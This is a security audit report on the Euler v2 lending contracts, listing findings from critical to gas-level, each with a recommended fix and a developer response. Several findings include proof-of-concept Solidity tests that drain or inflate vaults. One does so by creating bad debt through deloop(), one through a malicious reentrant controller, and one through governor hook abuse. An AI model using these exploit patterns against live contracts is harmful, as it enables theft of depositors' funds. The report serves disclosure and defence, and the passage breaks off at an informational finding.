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yAudit Euler v2 Review
Review Resources:
- Euler whitepaper
- Euler litepaper
- EVC documentation
- EVC playground
- Access to a linear.app project containing the specs of the contracts
- Multiple articles and additional documentation
- adriro
- Invader-tak
Table of Contents
Review Summary
Euler v2
The Euler v2 (EVK) system is a robust platform that facilitates the construction of credit vaults. These credit vaults, unlike typical ERC-4626 vaults, are passive lending pools with added borrowing functionality. They earn yield by continuously increasing the amount of their outstanding liability, resulting in yield for the depositors.
Users can borrow from a credit vault if sufficient collateral is deposited in other credit vaults. The liability vault (the one from which the loan was made) decides which credit vaults are acceptable as collateral. Borrowers are charged interest by continuously increasing the amount of their outstanding liability, and this interest results in yield for the depositors.
Vaults are integrated with the Ethereum Vault Connector contract (EVC), which tracks the vaults used as collateral by each account, and Euler price oracles (EPO), which provide the asset pricing necessary for the system to determine the value of user and system collateral and liabilities. If a liquidation is required, the EVC allows a liability vault to withdraw collateral on a user's behalf.
The contracts for the Euler v2's EVC repo, EVK repo, and EPO repo underwent a meticulous review over 30 days. This comprehensive code review was performed by three auditors between March 25th and May 5th, 2024. The repositories were under active development during the review; the review was, however, limited to the following commits:
for the EVC repo.7d2408dc1013b6f3149a5f08a69ded4dc99db7c8
for the EVK repo.416d131f79e66bc54574194ea922bce232ce398c
for the EPO repo.
The scope of the review consisted of the following contracts at the specific commit:
├── Errors.sol
├── EthereumVaultConnector.sol
├── Events.sol
├── ExecutionContext.sol
├── Set.sol
├── TransientStorage.sol
├── interfaces
│ ├── IERC1271.sol
│ ├── IEthereumVaultConnector.sol
│ └── IVault.sol
└── utils
└── EVCUtil.sol
│ ├── DToken.sol
│ ├── Dispatch.sol
│ ├── EVault.sol
│ ├── IEVault.sol
│ ├── modules
│ │ ├── BalanceForwarder.sol
│ │ ├── Borrowing.sol
│ │ ├── Governance.sol
│ │ ├── Initialize.sol
│ │ ├── Liquidation.sol
│ │ ├── RiskManager.sol
│ │ ├── Token.sol
│ │ └── Vault.sol
│ └── shared
│ ├── AssetTransfers.sol
│ ├── BalanceUtils.sol
│ ├── Base.sol
│ ├── BorrowUtils.sol
│ ├── Cache.sol
│ ├── Constants.sol
│ ├── EVCClient.sol
│ ├── Errors.sol
│ ├── Events.sol
│ ├── LTVUtils.sol
│ ├── LiquidityUtils.sol
│ ├── Storage.sol
│ ├── lib
│ │ ├── ConversionHelpers.sol
│ │ ├── ProxyUtils.sol
│ │ ├── RPow.sol
│ │ ├── RevertBytes.sol
│ │ └── SafeERC20Lib.sol
│ └── types
│ ├── AmountCap.sol
│ ├── Assets.sol
│ ├── ConfigAmount.sol
│ ├── Flags.sol
│ ├── LTVConfig.sol
│ ├── LTVType.sol
│ ├── Owed.sol
│ ├── Shares.sol
│ ├── Snapshot.sol
│ ├── Types.sol
│ ├── UserStorage.sol
│ ├── VaultCache.sol
│ └── VaultStorage.sol
├── GenericFactory
│ ├── BeaconProxy.sol
│ ├── GenericFactory.sol
│ └── MetaProxyDeployer.sol
├── InterestRateModels
│ ├── IIRM.sol
│ └── IRMLinearKink.sol
├── ProductLines
│ ├── BaseProductLine.sol
│ ├── Core.sol
│ └── Escrow.sol
├── ProtocolConfig
│ ├── IProtocolConfig.sol
│ └── ProtocolConfig.sol
├── Synths
│ ├── ERC20Collateral.sol
│ ├── ESynth.sol
│ ├── EulerSavingsRate.sol
│ ├── IRMSynth.sol
│ └── PegStabilityModule.sol
└── interfaces
├── IBalanceTracker.sol
├── IPermit2.sol
└── IPriceOracle.sol
├── EulerRouter.sol
├── adapter
│ ├── BaseAdapter.sol
│ ├── CrossAdapter.sol
│ ├── chainlink
│ │ ├── AggregatorV3Interface.sol
│ │ └── ChainlinkOracle.sol
│ ├── chronicle
│ │ ├── ChronicleOracle.sol
│ │ └── IChronicle.sol
│ ├── lido
│ │ ├── IStEth.sol
│ │ └── LidoOracle.sol
│ ├── maker
│ │ ├── IPot.sol
│ │ └── SDaiOracle.sol
│ ├── pyth
│ │ └── PythOracle.sol
│ ├── redstone
│ │ └── RedstoneCoreOracle.sol
│ ├── rocketpool
│ │ ├── IReth.sol
│ │ └── RethOracle.sol
│ └── uniswap
│ └── UniswapV3Oracle.sol
├── interfaces
│ └── IPriceOracle.sol
└── lib
├── Errors.sol
├── Governable.sol
└── ScaleUtils.sol
At the beginning of the audit the following known issues present in the reviewed codebase were disclosed by the Euler team:
clears the accumulated fees before using them in the subtraction at line 157. Fixed inb49869cc9bf14e9b343ca490734195d7494a36c8
.- SDaiOracle.sol returns a stale exchange rate if
was not called in the same block. Fixed in PR #30. flashLoan()
sends an incorrect address to thevalidateAndCallHook()
function. Fixed in PR #88.
The review was done to identify potential vulnerabilities in the code. While not investigating the team's security practices or operational security, the reviewers assumed that privileged accounts could be trusted. It's important to note that the reviewers did not evaluate the security of the code relative to a standard or specification. Therefore, the review may not have identified all potential attack vectors or areas of vulnerability.
During the review, the auditors presented their findings to the Euler team, which provided commentary and fixed the findings across several PRs.
yAudit and the auditors, committed to transparency, make no warranties regarding the security of the code and do not warrant that the code is free from defects. yAudit and the auditors do not represent nor imply to third parties that the code has been audited nor that the code is free from defects. By deploying or using the code, Euler and users of the contracts agree to use the code at their own risk.
Code Evaluation Matrix
Category | Mark | Description |
Access Control | Average | While a high degree of due diligence has been taken to ensure that only the appropriate entity has access to functions or that functions cannot be accessed in certain states, several findings pointed to gaps in the latter due to missing function locks or caller validation. |
Mathematics | Good | Some Minor rounding errors and potential overflows were discovered during the audit, but no potential exploit could be derived from them. |
Complexity | Low | The system demonstrated a high level of complexity in the interaction between EVC and EVK and the design's modularity and partial implementation, akin to object-oriented typed hierarchies, which is an unusual approach in smart contract development. While complex, it is a well-designed system, and the team rigorously adhered to good design principles. |
Libraries | Average | While leveraging some industry-standard libraries, Euler has notably chosen to develop its own or adapt existing solutions to meet its requirements. |
Decentralization | Average | By its design, the system has several high-trust components, which ultimately means that the end user needs to trust the governance of a vault or the system as a whole. |
Code stability | Low | The codebases were under active development during the audit, which resulted in some findings being redundant as they either had been fixed previously or the affected code had been removed from the code base all together. |
Documentation | Good | Documentation for the repositories was generally good - A lot of resources were provided to the auditors to understand architectural and design choices and requirements. |
Monitoring | Good | Multiple events are emitted through the protocol life-cycle, providing good coverage of state changes. |
Testing and verification | Average | The commit that was provided lacked test coverage in several key areas. While this was an area of active development, additional coverage was added during the audit; it was not within the audit's scope to determine whether this additional coverage was deemed sufficient. |
Findings Explanation
Findings are broken down into sections by their respective impact:
- Critical, High, Medium, Low Impact
- These findings range from attacks that may cause loss of funds, impact control/ownership of the contracts, or cause any unintended consequences/actions that are outside the scope of the requirements.
- Gas savings
- Findings that can improve the gas efficiency of the contracts.
- Informational
- Findings including recommendations and best practices.
Critical Findings
1. Critical - Missing controller check in deloop()
allows an attacker to create bad debt using two vaults against each other
The deloop()
function lacks an account check. In the context of 2 vaults that work as collateral for each other (e.g., Core USDC is accepted as collateral on Core ETH and the opposite), this can result in an attacker being able to steal funds and create bad debt.
Technical Details
Actions that affect the liquidity of a vault use the initOperation()
internal function to defer a vault check and sometimes a controller check on an account.
Depending on whether the function can result in a lower health factor for the account,
the initOperation()
will be called with either the account
if true and a controller check is needed or with CHECKACCOUNT_NONE
if false and no controller check is required.
Functions like repay()
don't trigger a controller check because the health factor can only increase.
However, inside the repay()
function there is an internal call to the pullAssets()
function that creates a check for the account
the assets are transferred from, in case the assets used to repay someone else's debt were used as collateral by the repayer.
This is not true for the deloop()
function because it doesn't call the pullAssets()
function. This means a user can use his balance to reimburse someone else's debt, and no controller check will be performed on either user.
It could become an issue if the user reimbursing used these tokens as collateral somewhere else, as it would reduce his health factor and potentially create bad debt.
Imagine a likely scenario of 2 core vaults, Core ETH and Core USDC; each vault accepts the other one as collateral with an LTV of 80%:
- An attacker creates two wallets and deposits $ 150 into each ($ 300 total).
- Attacker A deposits 150$ on vault ETH and borrows 100$ on vault USDC.
- Attacker B deposits 150$ on vault USDC and borrows 100$ on vault ETH.
- Now, if Attacker B calls
on vault USDC and puts attacker A asdebtFrom
he can reduce his collateral to 50$ and erase Attacker A's debt.
This results in Attacker A having 100$ of USDC and 150$ of ETH and Attacker B having 100$ of ETH. Thus, he has a total of 350$ free to move, while he started with 300$.
Proof of concept
Replace setup()
and paste test_deloopBadDebt()
into borrow.t.sol.
In this example, borrower
has a borrow position of 8 eTST and 10 eTST2 as collateral, while borrower2
has a borrow position of 8 eTST2 and ten eTST as collateral.
The prices are the same; both have an LTV of 90%.
function setUp() public override {
depositor = makeAddr("depositor");
borrower = makeAddr("borrower");
borrower2 = makeAddr("borrower_2");
// Setup
oracle.setPrice(address(assetTST), unitOfAccount, 1e18);
oracle.setPrice(address(assetTST2), unitOfAccount, 1e18);
oracle.setPrice(address(eTST), unitOfAccount, 1e18);
oracle.setPrice(address(eTST2), unitOfAccount, 1e18);
eTST.setLTV(address(eTST2), 0.9e4, 0);
eTST2.setLTV(address(eTST), 0.9e4, 0);
// Depositor
assetTST.mint(depositor, type(uint256).max);
assetTST.approve(address(eTST), type(uint256).max);
eTST.deposit(100e18, depositor);
// Borrower
assetTST2.mint(borrower, type(uint256).max);
assetTST2.approve(address(eTST2), type(uint256).max);
eTST2.deposit(10e18, borrower);
function test_deloopBadDebt() public {
//setup borrower 1
//borrower has 10 eTST2
evc.enableCollateral(borrower, address(eTST2));
evc.enableController(borrower, address(eTST));
eTST.borrow(8e18, borrower);
assertEq(assetTST.balanceOf(borrower), 8e18);
//setup borrower 2
assetTST.mint(borrower2, type(uint256).max);
assetTST.approve(address(eTST), type(uint256).max);
eTST.deposit(10e18, borrower2);
//borrower2 has 10 eTST
evc.enableCollateral(borrower2, address(eTST));
evc.enableController(borrower2, address(eTST2));
eTST2.borrow(8e18, borrower2);
assertEq(assetTST2.balanceOf(borrower2), 8e18);
(uint256 collateralValue, uint256 liabilityValue) = eTST.accountLiquidity(borrower, false);
emit log("User 1 state");
emit log("Collateral:");
emit log_uint(collateralValue);
emit log("Liability:");
emit log_uint(liabilityValue);
(collateralValue, liabilityValue) = eTST2.accountLiquidity(borrower2, false);
emit log("User 2 state");
emit log("Collateral:");
emit log_uint(collateralValue);
emit log("Liability:");
emit log_uint(liabilityValue);
//borrower2 deloop for borrower1
emit log("Exec deloop from user2 on user 1");
eTST.deloop(8e18, borrower);
(collateralValue, liabilityValue) = eTST.accountLiquidity(borrower, false);
emit log("User 1 state");
emit log("Collateral:");
emit log_uint(collateralValue);
emit log("Liability:");
emit log_uint(liabilityValue);
(collateralValue, liabilityValue) = eTST2.accountLiquidity(borrower2, false);
emit log("User 2 state");
emit log("Collateral:");
emit log_uint(collateralValue);
emit log("Liability:");
emit log_uint(liabilityValue);
Critical. It is very likely that some core vaults will accept each other as collateral; in this case, an attacker could use deloop()
to drain them and create bad debt.
Modify the initOperation()
function to check the calling account
Developer Response
Fixed in commit 0118010f069dee7d5e76e5bfe1496ca53e065417.
We have taken several steps to ensure that no other similar problems exist in the codebase or can be added in the future. Now, when the tests run in CI, critical internal functions are overridden to perform invariant checks upon each invocation. One of the invariant checks verifies that functions which could decrease user health such as increaseBorrow and decreaseBalance always have the account added to the EVC's list of deferred accounts (and therefore a status check has been scheduled). We are also in the process of improving the fuzz testing suite so that multiple vaults will be created in configurations that would detect this and other issues. Finally, we are working towards an invariant with Certora that will hopefully be able to prove that absent any pricing changes, it is impossible for an account to go from healthy to unhealthy.
High Findings
1. High - EulerSavingsRate can be reentered using a malicious controller to increase the price per share
The EulerSavingsRate contract can be reentered using a malicious controller to increase the price per share. This will allow the attacker to withdraw more than deposited, and if the ESR was used as collateral, it could also allow an attacker to borrow more than should be allowed on an Euler lending market.
Technical Details
The EulerSavingsRate allows users holding an eSynth token to receive interest on their tokens; it is similar to products like sDAI, where a user can deposit his DAI tokens to receive interest on them.
The particularity here is that the eSynth token and EulerSavingsRate integrate with the EVC contract. When a user call deposit()
or withdraw()
on the EulerSavingsRate vault, the eSynth is transferred which triggers a controller check on the EVC through requireAccountStatusCheck()
Additionally the EulerSavingsRate vault uses an internal accounting to determine the price per share, inside the totalAssets()
function it uses the totalAssetsDeposited
variable and the interestAccrued()
function that returns the interests available for distribution.
The reentrancy attack is made possible by the controller check. When a user deposits in the vault, the eSynth tokens are sent, and the controller check is done before the totalAssetsDeposited
is updated. An attacker can set a malicious contract as controller, and during the call to it, the controller could call the gulp()
This function determines how much interest is available to be distributed; it uses the eSynth balance of the contract and subtracts the internal balance from it. However, since the internal balance totalAssetsDeposited
hasn't been updated yet during the malicious controller's reentrancy, the function will assume that the balance deposited by the attacker can be distributed as interest to depositors over the next two weeks.
The vault then saves the deposited amount twice into the accounting system, once inside the totalAssetsDeposited
and once as interest to be distributed that will be returned over time by interestAccrued()
The attacker can do this attack and withdraw more than the deposit as soon as one block later; the longer he waits, the more tokens he will earn. Additionally, since the price per share is modified if the EulerSavingsRate is used as collateral on an Euler lending market, the attacker could borrow more than he should.
Proof of concept
In the following test, user2
executes the attack, waits one week, and then withdraws.
It can be copy pasted inside ESynthGeneralTest.sol.
function test_depositGetInterest() public {
uint256 amount = 500 ether;
esynth.setCapacity(address(this), MAX_ALLOWED);
esynth.mint(user1, amount);
esynth.mint(user2, amount);
EulerSavingsRate savings = new EulerSavingsRate(evc, address(esynth), "ESYNTH SAVING", "ESAVE");
MaliciousController mc = new MaliciousController(address(savings));
//user 1 deposit his synth in the saving vault
esynth.approve(address(savings), type(uint256).max);
uint shares = savings.deposit(amount, user1);
//user 2 deposit his synth in the saving vault
//set malicious controller
evc.enableController(user2, address(mc));
esynth.approve(address(savings), type(uint256).max);
uint shares2 = savings.deposit(amount, user2);
emit log_uint(shares);
emit log_uint(shares2);
skip(1 weeks);
uint received = savings.redeem(shares2, user2, user2);
emit log("User 2 (malicious) received");
emit log_uint(received);
savings.redeem(shares, user1, user1);
contract MaliciousController {
EulerSavingsRate savings;
bool gulpNextCall;
constructor(address s) {
savings = EulerSavingsRate(s);
function setGulpNextCall() external {
gulpNextCall = true;
function checkAccountStatus(address user, address[] calldata collaterals) external returns (bytes32 magicValue) {
if (gulpNextCall) {
gulpNextCall = false;
return bytes32(bytes4(0xb168c58f));
High. An attacker can steal tokens from other depositors and increase the price per share to borrow more on an Euler lending market.
Consider implementing both of these suggestions:
Consider adding a reentrancy lock to the
functions. -
Consider updating the
before calling thesuper._deposit()
since the call to the controller happens after the eSynth tokens are sent to or from the vault.
Developer Response
Fixed in commit ad9c96cc46027465b0fafc3a97be15d7918adaba.
Medium Findings
1. Medium - Optional calls can be forced to fail by manipulating the gas limit
An attacker can intentionally force the failure of calls that are allowed to revert by abusing EIP-150.
Technical Details
When user balances are updated in BalanceUtils.sol, the implementation notifies the balance tracker using an optional callback defined by tryBalanceTrackerHook()
119: function tryBalanceTrackerHook(address account, uint256 newAccountBalance, bool forfeitRecentReward)
120: private
121: returns (bool success)
122: {
123: (success,) = address(balanceTracker).call(
124: abi.encodeCall(IBalanceTracker.balanceTrackerHook, (account, newAccountBalance, forfeitRecentReward))
125: );
126: }
The callback is allowed to fail, presumably to prevent disruptions to vault operations. However, a bad actor can force this call to fail by abusing the "1/64 rule," in which a portion of the gas is saved in the calling frame to continue execution. By manipulating the gas limit, an attacker can provide an amount such that the call to the balance tracker fails due to running out of gas. Yet, enough is reserved to allow the calling context to finish the transaction successfully.
Similarly, computeInterestRate()
uses an optional call to the interest rate model to update the interest rates.
094: function computeInterestRate(VaultCache memory vaultCache) internal virtual returns (uint256) {
095: // single sload
096: address irm = vaultStorage.interestRateModel;
097: uint256 newInterestRate = vaultStorage.interestRate;
099: if (irm != address(0)) {
100: (bool success, bytes memory data) = irm.call(
101: abi.encodeCall(
102: IIRM.computeInterestRate,
103: (address(this), vaultCache.cash.toUint(), vaultCache.totalBorrows.toAssetsUp().toUint())
104: )
105: );
107: if (success && data.length >= 32) {
108: newInterestRate = abi.decode(data, (uint256));
109: if (newInterestRate > MAX_ALLOWED_INTEREST_RATE) newInterestRate = MAX_ALLOWED_INTEREST_RATE;
110: vaultStorage.interestRate = uint72(newInterestRate);
111: }
112: }
114: return newInterestRate;
115: }
The call is allowed to fail, in which case rates are kept as they previously were.
Medium. An attacker can withdraw their balance without notifying the balance tracker of the change. The impact would depend on the nature of the tracker. For example, in the context of a reward, it could imply that the rewarder continues to issue rewards for a non-existent deposit. For the interest rate call, it would allow an attacker to skip the update after vault operations are executed. However, successfully executing this attack would be very difficult due to the low gas requirements of the current IRM implementation. Additionally, the attack can be mitigated by executing any other operation in the vault, such as a simple touch.
The attack can be mitigated by checking the amount of gas remaining after the call while maintaining its optionality.
uint256 gasBefore = gasleft();
(success,) = address(target).call{gas: gasBefore}(data);
require(gasleft() > gasBefore / 63);
Developer Response
Fixed in commit 390dc35b8ff99deb21be44716dd7e2c0bc7e2c7e.
2. Medium - A malicious governor can steal assets by abusing hooks
The vault forwards the original calldata to the hook target, which would allow cash transfers out of the vault if pointed to the asset itself.
Technical Details
Hooks can be used to validate operations. These are triggered when a new operation is executed in the vault:
77: function validateAndCallHook(Flags hookedOps, uint32 operation, address caller) internal {
78: if (hookedOps.isNotSet(operation)) return;
80: address hookTarget = vaultStorage.hookTarget;
82: if (hookTarget.code.length == 0) revert E_OperationDisabled();
84: (bool success, bytes memory data) = hookTarget.call(abi.encodePacked(msg.data, caller));
86: if (!success) RevertBytes.revertBytes(data);
87: }
As we can see from the previous code snippet, the vault forwards the original calldata from the operation to the hook address. Having control of the target would allow the reproduction of the same messages on arbitrary addresses.
A malicious governor could point the target to the underlying asset and execute the functions associated with the operations from the vault context. In particular, it could hook the transfer operation to steal cash from the vault (as the following test shows).
Proof of concept
function test_StealAssetsUsingHooks() public {
address depositor = makeAddr("depositor");
address aux = makeAddr("aux");
address gov = address(this);
uint256 amount = 1e18;
assetTST.mint(depositor, amount);
assetTST.mint(gov, amount);
assetTST.approve(address(eTST), type(uint256).max);
eTST.deposit(amount, depositor);
assetTST.approve(address(eTST), type(uint256).max);
eTST.deposit(amount, gov);
// hack
eTST.setHookConfig(address(assetTST), OP_TRANSFER);
eTST.transfer(aux, amount);
eTST.withdraw(amount, aux, aux);
// vault is empty
assertEq(assetTST.balanceOf(address(eTST)), 0);
Medium. The issue would allow theft of funds but requires connivance from governance.
A direct mitigation could be to ban the asset address from being set as the hook target. Additionally, the interface could be improved by requiring the hook response to be a specific constant, such as a selector, an interface ID, or any arbitrary value that could be used to avoid retargeting hooks to non-compliant addresses.
Developer Response
Fixed in commit 3ad86bb0a50b660108104dae7a52ac9625c14c29.
Low Findings
1. Low - Uninitialized reentrancy state in BaseProductLine.sol
The contract contains a reentrancy lock storage variable that is left uninitialized.
Technical Details
The BaseProductLine.sol contract includes a reentrancyLock
variable that is meant to be used with the values 1 (for unlocked) and 2 (for locked).
15: uint256 constant REENTRANCYLOCK__UNLOCKED = 1;
16: uint256 constant REENTRANCYLOCK__LOCKED = 2;
Since reentrancyLock
is never initialized with REENTRANCYLOCK__UNLOCKED
the use of the nonReentrant()
modifier will always revert:
40: modifier nonReentrant() {
41: if (reentrancyLock != REENTRANCYLOCK__UNLOCKED) revert E_Reentrancy();
43: reentrancyLock = REENTRANCYLOCK__LOCKED;
44: _;
45: reentrancyLock = REENTRANCYLOCK__UNLOCKED;
46: }
Low. Functions that use this modifier will always revert when called. However, the modifier is currently not used in any function.
Initialize reentrancyLock
or remove the functionality.
Developer Response
Fixed in commit 6a4f8be118b331d84343efd0bde6a23f4741a1fc.
2. Low - Missing validation in protocol fee receiver
There is a missing check for address(0)
while overriding the protocol fee receiver in setVaultFeeConfig()
Technical Details
While setFeeReceiver()
checks that the updated value is different from the zero address, this validation is not enforced while overriding the fee receiver at the vault level in setVaultFeeConfig()
Low. convertFees()
will revert if shares are distributed to the zero address.
Check that feeReceiver_ != address(0)
in setVaultFeeConfig()
. The check could be skipped when exists_
is false.
Developer Response
Fixed in commit d4f157dab3ded31acc1b77902e7946b8921e3300.
3. Low - Gulping in ESR can be bricked with large amounts
The implementation of gulp()
reverts when the ingested amount exceeds the maximum uint168
without the possibility of recovery.
Technical Details
When gulping new assets, the function checks that the current amount of interestLeft
plus the new toGulp
is below the maximum uint168
133: uint256 assetBalance = IERC20(asset()).balanceOf(address(this));
134: uint256 toGulp = assetBalance - totalAssetsDeposited - esrSlotCache.interestLeft;
136: if (toGulp > type(uint168).max - esrSlotCache.interestLeft) revert E_GulpTooMuch();
138: esrSlotCache.interestSmearEnd = uint40(block.timestamp + INTEREST_SMEAR);
139: esrSlotCache.interestLeft += uint168(toGulp);
The check is placed because the update in line 139 would otherwise overflow since ESRSlot.interestLeft
is of type uint168
However, in the improbable case such a scenario happens, this could brick the function since there is no way to recover from it if the distribution of interestLeft
doesn't provide enough margin to fit toGulp
, which is also expected to continue growing.
Low. The function could be bricked, but it would require an enormous amount of new distributable assets, which is unlikely.
Instead of reverting, limit the amount of toGulp
to the available margin of type(uint168).max - esrSlotCache.interestLeft
Developer Response
Fixed in commit c6bd4565170d2445f1272b3990baa3462d9d4958.
4. Low - Pyth feed update fee is not refunded
When requesting a price update, the Pyth oracle forwards all value to IPyth.updatePriceFeeds()
, which doesn't refund any unused fees.
Technical Details
The implementation of the Pyth.updatePriceFeeds()
function checks that the submitted amount is enough to cover the fees, but doesn't issue any refund if needed.
Low. Excess of fees will be lost.
Calculate the proper amount using IPyth.getUpdateFee()
. The rest can be refunded to the caller or left in the contract for future calls.
Developer Response
Fixed in commit 2a088785db6e3d6039ba189251c016377a1b80d7.
5. Low - Potential overflow in getCollateralValue()
The value of a collateral position is calculated using unchecked math, leading to a potential overflow vulnerability.
Technical Details
applies the LTV factor using ConfigAmountLib::mul()
, which uses unsafe math.
20: // note assuming arithmetic checks are already performed
21: function mul(ConfigAmount self, uint256 multiplier) internal pure returns (uint256) {
22: unchecked {
23: return uint256(self.toUint16()) * multiplier / 1e4;
24: }
25: }
Low. The collateral amount and value would need to be excessively high to trigger the overflow.
Don't use unchecked math to perform the calculation.
Developer Response
Fixed in commit 14a6fdd8eb80a9e453d2fd6905bcf28bff13914f.
6. Low - Potential accounting issue in Cache.sol
The final check in the Cache.sol::initVaultCache
function checks if both newTotalShares <= MAX_SANE_AMOUNT
and newTotalBorrows <= MAX_SANE_DEBT_AMOUNT
are true, but a scenario where newTotalShares exceeds MAX_SANE_AMOUNT but totalBorrows <= MAX_SANE_DEBT_AMOUNT could technically occur.
Technical Details
The calculation of newTotalShares could potentially exceed MAX_SANE_AMOUNT - this is protected against in TypesLib
when the vault converts between assets and shares during deposits:
function toShares(uint256 amount) internal pure returns (Shares) {
if (amount > MAX_SANE_AMOUNT) revert Errors.E_AmountTooLargeToEncode();
return Shares.wrap(uint112(amount));
But in the initVaultCache
function, the following could push the totalAssets into excess of MAX_SANE_AMOUNT:
function toShares(uint256 amount) internal pure returns (Shares) {
if (feeAssets != 0) {
uint256 newTotalAssets = vaultCache.cash.toUint() + (newTotalBorrows >> INTERNAL_DEBT_PRECISION);
newTotalShares = newTotalAssets * newTotalShares / (newTotalAssets - feeAssets);
newAccumulatedFees += newTotalShares - vaultCache.totalShares.toUint();
Because of this, in a scenario where a legitimate borrow would take place, but the newTotalshares got pushed over MAX_SANE_AMOUNT, we would not update the totalBorrows, interestAccumulator, and lastInterestAccumulatorUpdate in the vault, effectively breaking accounting.
Low. The vault's accounting would be broken, but it seems unlikely that this scenario would be possible to create.
Remove the newTotalShares <= MAX_SANE_AMOUNT
check from the first if statement. Consider checking if newTotalAsset
already is equal to MAX_SANE_AMOUNT
before adding feeAssets
, and if newTotalAssets * newTotalShares / (newTotalAssets - feeAssets) > MAX_SANE_AMOUNT
, set newTotalShares
Developer Response
Fixed in commit e958523b418cb2de19115de90d9ba96a8126cc1f.
7. Low - Redstone oracle payload staleness isn't factored in the defined maximum staleness
Signed payloads from the Redstone oracle include a timestamp, which isn't considered when updating the price, leading to a potentially longer validity period for the fetched price.
Technical Details
The Redstone Core model works by injecting signed payloads into the user transaction that queries the feed price. The timestamp included in this payload is validated to be no older than DEFAULT_MAX_DATA_TIMESTAMP_DELAY_SECONDS
(3 minutes by default).
When prices are updated through updatePrice()
, lastUpdatedAt
is updated to the current block timestamp, ignoring any staleness carried by the payload.
Consider the following:
- User calls
, including a payload that is 3 minutes old. - Contract updates price and sets
lastUpdatedAt = block.timestamp
. - Since
checksblock.timestamp - lastUpdatedAt <= maxStaleness
means that the actual validity period of the stored price will bemaxStaleness + 3 minutes
The carried staleness also impacts the frequency at which updatePrice()
can be called. Due to the check at line 60, this function needs a 3-minute margin before it can be called again. Combined with the inner timestamp, this means locking for 3 minutes, a value up to 3 minutes old.
Low. Oracle staleness can be misinterpreted due to the underlying staleness of the Redstone data. Potentially stale prices are blocked for 3 minutes, which could be problematic during periods of high volatility.
We understand that these implementation decisions stem from the difficulties of extracting the inner timestamp from the Redstone data, which their SDK does not provide. We recommend documenting these two details so that consumers know the potential pitfalls.
Developer Response
Fixed in commit a89b2a4a89d7806702a27592baad03288c74a633.
Gas Saving Findings
1. Gas - Chronicle Oracle -redundant check
The function call to readWithAge()
already checks if value != 0
, making the check in the adaptor redundant.
Technical Details
It makes the price == 0
below in ChronicleOracle.sol redundant.
function _getQuote(uint256 inAmount, address _base, address _quote) internal view override returns (uint256) {
bool inverse = ScaleUtils.getDirectionOrRevert(_base, base, _quote, quote);
(uint256 price, uint256 age) = IChronicle(feed).readWithAge();
if (price == 0) revert Errors.PriceOracle_InvalidAnswer();
uint256 staleness = block.timestamp - age;
if (staleness > maxStaleness) revert Errors.PriceOracle_TooStale(staleness, maxStaleness);
return ScaleUtils.calcOutAmount(inAmount, price, scale, inverse);
Gas savings.
Remove the redundant check.
Developer Response
Fixed in commit a86eee9a6b08362feb3357d5ad9e708624b22af1.
2. Gas - Use unchecked math if there is no overflow risk
There are math operations that can be done unchecked arithmetic for gas savings.
Technical Details
- Borrowing.sol#L92
- Borrowing.sol#L101
- Vault.sol#L174
- Vault.sol#L261
- BorrowUtils.sol#L157
- BorrowUtils.sol#L161
- IRMLinearKink.sol#L53, just the subtraction
utilisation - kink
. - ESynth.sol#L73
- Liquidation.sol#L205
Gas savings.
Use unchecked block if there is no overflow or underflow risk for gas savings.
Developer Response
Fixed in the following commits:
was removed in 59a4ac1cf6f90242c73d6cfda12c33cd5f7422fe.- Vault.sol#L174: 9b970cbda390e228148ea8d2dd9b8561279cc828.
- Vault.sol#L261: 59aa4c4a0ab675794a84b2163a4eafc969b49a15.
- BorrowUtils.sol#L157 and BorrowUtils.sol#L161: 0f121726cced67833755c7443a089e0bec97c64f.
- IRMLinearKink.sol#L53: 5ca69be73652f56a720ddae01606937f18f84c2e.
- ESynth.sol#L73: fb2cb590f28e7b17bcbaf112ffa5cfaecaca1153.
- Liquidation.sol#L205: c1bfbd59be70d99fbb8124d9c1d1edcde6fe89a1.
3. Gas - Unchecked blocks don't apply to overloaded operators
Unchecked blocks are used for math operations applied to custom operand types (Assets
, Owed
, Shares
), which do not affect overloaded operators.
Technical Details
Gas savings.
The unchecked block needs to be moved to the underlying operator implementation.
Developer Response
Fixed in commit 0f121726cced67833755c7443a089e0bec97c64f.
4. Gas - Oracle quote can be skipped when collateral equals unit of account
The implementation does the check when quoting the vault asset but doesn't apply the same strategy when quoting the collaterals.
Technical Details
Gas savings.
Skip the getQuote()
call when the base and quote are the same tokens.
Developer Response
Acknowledged - While quoting the collaterals in terms of liability asset is a plausible scenario, collateral being the unit of account would be purely coincidental and in our opinion doesn't justify extra code paths.
5. Gas - MinterData is updated to storage twice in ESynth.sol
The implementation uses a minterCache
storage reference and then updates both this reference and the minters
Technical Details
Gas savings.
Set minterCache
as a memory reference, or do the update once directly to storage.
Developer Response
Fixed in commit 2e8ca79c686db3a7ee4ad8790202b38534dac69a.
6. Gas - Allowance check can be skipped when the owner is the spender
Fetching the allowance balance can be skipped when the owner account matches the spender, saving a load from storage.
Technical Details
In decreaseAllowance()
, the spender's allowance is fetched before checking if owner != spender
108: uint256 allowance = vaultStorage.users[owner].eTokenAllowance[spender];
109: if (owner != spender && allowance != type(uint256).max) {
Gas savings.
Fetch the allowance after checking if owner != spender
- uint256 allowance = vaultStorage.users[owner].eTokenAllowance[spender];
- if (owner != spender && allowance != type(uint256).max) {
+ if (owner != spender) {
+ uint256 allowance = vaultStorage.users[owner].eTokenAllowance[spender];
+ if (allowance != type(uint256).max) {
if (allowance < amount.toUint()) revert E_InsufficientAllowance();
unchecked {
allowance -= amount.toUint();
vaultStorage.users[owner].eTokenAllowance[spender] = allowance;
emit Approval(owner, spender, allowance);
+ }
Developer Response
Fixed in commit 4b96fbeaccd9ae6c3e35abf07406c757f25e590d.
7. Gas - Use immutable variables
Several storage variables are configured at deployment time and remain immutable throughout the contract's lifecycle.
Technical Details
The following storage variables can be changed to immutable variables.
Gas savings.
Change the listed variables to immutable.
Developer Response
8. Gas - return esrSlotCache.interestLeft
when block.timestamp >= esrSlotCache.interestSmearEnd
Technical Details
In the function interestAccruedFromCache()
the first condition checks if we reach the interestSmearEnd
The condition checks if the block.timestamp
is greater, but it could be changed to a greater or equal condition, as the result will be the same.
Gas savings.
Change condition from block.timestamp > esrSlotCache.interestSmearEnd
to block.timestamp >= esrSlotCache.interestSmearEnd
Developer Response
Fixed in commit 19279b4426d871d592b512541e29e7cebed7fed2.
9. Gas - Unnecessary validateController()
in calculateLiquidation()
Technical Details
In the function calculateLiquidation()
the validateController()
check is used on the violator
. Still, it is not needed as the EVC's controlCollateral()
function will also check that the contract calling is the controller of the violator
Gas savings.
Remove the check.
Developer Response
Acknowledged. While the gas optimization could be achieved, because of the sensitive nature of liquidation flows, we prefer to keep the explicit check for the violator's controller along with the rest of checks.
Informational Findings
1. Informational - calculateDTokenAddress()
may not work on all EVM-compatible chains
Technical Details
